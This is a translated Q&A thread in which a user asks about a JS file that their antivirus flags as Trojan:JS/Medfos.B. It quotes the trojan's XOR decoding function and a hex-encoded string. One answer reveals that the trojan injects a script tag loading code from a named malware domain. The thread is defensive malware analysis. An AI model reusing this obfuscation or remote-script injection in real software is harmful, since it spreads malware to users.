0

编辑:最初认为这是Chrome 捆绑在一起的,但它可能已经在我的机器上,除非它是 PortableApps.com Chrome 便携包的一部分。

每次我从临时目录启动 Chrome 时都会执行这个 JS 文件。

C:\Users\Username\AppData\Local\Temp\ChromiumPortableTemp\scoped_dir_2280_30150\CRX_INSTALL\manager.js

研究这个,显然它与 Chrome 更新管理器有关,但我不能说是什么。

我的防病毒软件 (Comodo) 将其识别为Trojan:JS/Medfos.B.

从代码中,我可以破译它分析当前页面的 URL(可能使用 MD5 函数?),如果 URL 与预定义的 URL 匹配,则在页面中插入一些元素。

完整代码在这里: http: //paste2.org/fYPXA0pb

我认为这是 MD5 功能部分:

function n2(r3)
{
   o3='';
   for(var i=0;i<(r3.length/2);i++)
   {
      o3 +=String.fromCharCode(parseInt(r3.substring(i*2,i*2+2),16)^(i&0x0ff));
   }
   return o3;
}

真的很想知道这是在做什么!

4

2 回答 2

1

此代码将以下脚本标记添加到您的文档中。当心它确实是一个带有恶意软件的站点

<script src="http://disable-instant-search.com/js/disable.js?type=live&amp;user-agent=.....;gsu=...."></script>

它与 Chrome 更新管理器无关。如果您的 chrome 目录中有某些内容,这并不意味着它实际上属于 Google 或 Chrome。它可能已经放在那里,但您的机器上有其他病毒

于 2013-07-31T19:57:55.717 回答
0

您引用的功能是解密功能。在其余代码中多次调用它。将 n2 函数定义粘贴到 JavaScript 控制台中,然后从代码的其余部分复制粘贴调用:

function n2 (r3) {
   o3='';
   for(var i=0;i<(r3.length/2);i++) {
      o3 +=String.fromCharCode(parseInt(r3.substring(i*2,i*2+2),16)^(i&0x0ff));
   }
   return o3;
}

n2('6172692d676a6b292255257c696f20254b374e2c49642b') ==> "ReferenceError: n2 is not defined"
于 2013-07-31T19:59:03.667 回答